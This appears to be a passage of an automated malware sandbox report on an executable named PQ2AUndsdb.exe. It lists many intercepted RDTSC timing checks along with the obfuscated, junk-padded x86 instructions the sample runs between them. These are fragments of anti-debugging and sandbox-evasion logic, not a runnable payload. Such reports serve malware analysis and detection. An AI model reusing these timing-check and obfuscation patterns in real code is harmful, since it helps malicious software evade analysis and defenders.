Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B6025F second address: 4B602A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx esi, dx 0x0000000f pushfd 0x00000010 jmp 00007FA0AD4759E9h 0x00000015 adc ecx, 05312E56h 0x0000001b jmp 00007FA0AD4759E1h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B602A1 second address: 4B602A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B602A7 second address: 4B602AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B602AB second address: 4B60302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FA0AD45510Fh 0x0000000f je 00007FA120083457h 0x00000015 pushad 0x00000016 pushad 0x00000017 mov ah, CAh 0x00000019 call 00007FA0AD455117h 0x0000001e pop ecx 0x0000001f popad 0x00000020 mov eax, edx 0x00000022 popad 0x00000023 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FA0AD45510Dh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B60302 second address: 4B60317 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B60317 second address: 4B603A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA120083405h 0x0000000f jmp 00007FA0AD45510Eh 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 pushad 0x00000019 mov bx, ax 0x0000001c pushfd 0x0000001d jmp 00007FA0AD455118h 0x00000022 xor cx, B928h 0x00000027 jmp 00007FA0AD45510Bh 0x0000002c popfd 0x0000002d popad 0x0000002e jmp 00007FA0AD455118h 0x00000033 popad 0x00000034 or edx, dword ptr [ebp+0Ch] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FA0AD455117h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B603A8 second address: 4B603AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50923 second address: 4B50932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA0AD45510Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50932 second address: 4B50936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50936 second address: 4B50974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FA0AD455112h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FA0AD455110h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FA0AD45510Ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50974 second address: 4B5097A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B5097A second address: 4B509D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 mov esi, 1E047F19h 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FA0AD455114h 0x0000001c push eax 0x0000001d jmp 00007FA0AD45510Bh 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FA0AD455115h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B509D2 second address: 4B509D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B509D8 second address: 4B509DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B509DC second address: 4B509E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B509E0 second address: 4B50A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FA0AD455114h 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007FA0AD455110h 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov esi, ebx 0x0000001e call 00007FA0AD455119h 0x00000023 pop eax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50A33 second address: 4B50A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50A4C second address: 4B50A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop ebx 0x00000008 popad 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA0AD455113h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50A6C second address: 4B50AA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov dx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FA1200AB2ECh 0x00000012 jmp 00007FA0AD4759DAh 0x00000017 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001e jmp 00007FA0AD4759E0h 0x00000023 mov ecx, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50AA7 second address: 4B50AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50AC4 second address: 4B50B34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov bx, 338Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FA1200AB2A9h 0x00000012 jmp 00007FA0AD4759E5h 0x00000017 test byte ptr [77816968h], 00000002h 0x0000001e pushad 0x0000001f mov bx, si 0x00000022 popad 0x00000023 jne 00007FA1200AB295h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c jmp 00007FA0AD4759DEh 0x00000031 pushfd 0x00000032 jmp 00007FA0AD4759E2h 0x00000037 adc ecx, 1AB71868h 0x0000003d jmp 00007FA0AD4759DBh 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50B34 second address: 4B50B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA0AD455114h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50B4C second address: 4B50B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50B50 second address: 4B50B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FA0AD455117h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov eax, 62096F4Bh 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ebx, eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50C76 second address: 4B50C9D instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov esp, ebp 0x0000000a pushad 0x0000000b mov ah, 88h 0x0000000d jmp 00007FA0AD4759DFh 0x00000012 popad 0x00000013 pop ebp 0x00000014 pushad 0x00000015 movzx ecx, dx 0x00000018 push eax 0x00000019 push edx 0x0000001a mov cx, di 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD0F8D second address: 4BD0F93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD0F93 second address: 4BD0F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD0F99 second address: 4BD0FB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA0AD45510Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD0FB2 second address: 4BD0FB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD0FB6 second address: 4BD0FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD0431 second address: 4BD0437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD0437 second address: 4BD04A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455117h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA0AD45510Bh 0x00000017 or si, 056Eh 0x0000001c jmp 00007FA0AD455119h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FA0AD455110h 0x00000028 or al, FFFFFFE8h 0x0000002b jmp 00007FA0AD45510Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD04A6 second address: 4BD0501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA0AD4759E3h 0x00000012 xor ax, FD8Eh 0x00000017 jmp 00007FA0AD4759E9h 0x0000001c popfd 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD0501 second address: 4BD0514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B701E6 second address: 4B70219 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 6B3866DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA0AD4759E0h 0x00000012 or eax, 6B20F148h 0x00000018 jmp 00007FA0AD4759DBh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B70219 second address: 4B7021D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B7021D second address: 4B7027B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FA0AD4759DBh 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA0AD4759E2h 0x00000016 jmp 00007FA0AD4759E5h 0x0000001b popfd 0x0000001c movzx esi, di 0x0000001f popad 0x00000020 mov cx, bx 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FA0AD4759E1h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B7027B second address: 4B70290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B70290 second address: 4B702B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, 3C5Eh 0x00000011 mov si, dx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD06DF second address: 4BD06E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD06E3 second address: 4BD06E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD06E9 second address: 4BD06F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD06F1 second address: 4BD06FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ah, 24h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD06FF second address: 4BD071D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA0AD455111h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD071D second address: 4BD074A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FA0AD4759DEh 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD074A second address: 4BD0750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD0750 second address: 4BD0755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD0755 second address: 4BD075B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD075B second address: 4BD07A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov ah, 43h 0x0000000e movsx ebx, si 0x00000011 popad 0x00000012 push 9A3A6AF1h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FA0AD4759E8h 0x00000020 or cx, 8B98h 0x00000025 jmp 00007FA0AD4759DBh 0x0000002a popfd 0x0000002b mov edx, ecx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD07A2 second address: 4BD07B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 65C69511h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD07B8 second address: 4BD07BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BD07DC second address: 4BD07E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B806F2 second address: 4B806F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B806F6 second address: 4B806FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B806FC second address: 4B80797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA0AD4759DCh 0x00000009 add cl, FFFFFFE8h 0x0000000c jmp 00007FA0AD4759DBh 0x00000011 popfd 0x00000012 jmp 00007FA0AD4759E8h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ebp 0x0000001d jmp 00007FA0AD4759E0h 0x00000022 mov ebp, esp 0x00000024 jmp 00007FA0AD4759E0h 0x00000029 push FFFFFFFEh 0x0000002b jmp 00007FA0AD4759E0h 0x00000030 call 00007FA0AD4759D9h 0x00000035 jmp 00007FA0AD4759E0h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FA0AD4759DEh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80797 second address: 4B8079D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B8079D second address: 4B807ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push edx 0x00000011 movzx eax, di 0x00000014 pop edx 0x00000015 pushfd 0x00000016 jmp 00007FA0AD4759E4h 0x0000001b jmp 00007FA0AD4759E5h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B807ED second address: 4B807F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B807F4 second address: 4B80817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80817 second address: 4B8081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B8081B second address: 4B8081F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B8081F second address: 4B80825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80825 second address: 4B808AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA0AD4759DFh 0x00000011 xor eax, 3E14BECEh 0x00000017 jmp 00007FA0AD4759E9h 0x0000001c popfd 0x0000001d movzx esi, dx 0x00000020 popad 0x00000021 call 00007FA0AD4759D9h 0x00000026 jmp 00007FA0AD4759E3h 0x0000002b push eax 0x0000002c pushad 0x0000002d mov esi, edi 0x0000002f mov eax, ebx 0x00000031 popad 0x00000032 mov eax, dword ptr [esp+04h] 0x00000036 jmp 00007FA0AD4759DCh 0x0000003b mov eax, dword ptr [eax] 0x0000003d jmp 00007FA0AD4759DBh 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B808AE second address: 4B808B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B808B2 second address: 4B808C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B808C4 second address: 4B80918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA0AD455111h 0x00000008 mov eax, 4E269277h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 mov si, 596Fh 0x00000016 mov di, ax 0x00000019 popad 0x0000001a mov eax, dword ptr fs:[00000000h] 0x00000020 jmp 00007FA0AD45510Eh 0x00000025 nop 0x00000026 jmp 00007FA0AD455110h 0x0000002b push eax 0x0000002c pushad 0x0000002d push ebx 0x0000002e mov edx, esi 0x00000030 pop ecx 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80918 second address: 4B80945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 pushad 0x00000008 movsx ebx, ax 0x0000000b jmp 00007FA0AD4759E8h 0x00000010 popad 0x00000011 sub esp, 1Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80945 second address: 4B8094B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B8094B second address: 4B8095A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA0AD4759DBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B8095A second address: 4B8095E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B8095E second address: 4B80982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007FA0AD4759E2h 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80982 second address: 4B80986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
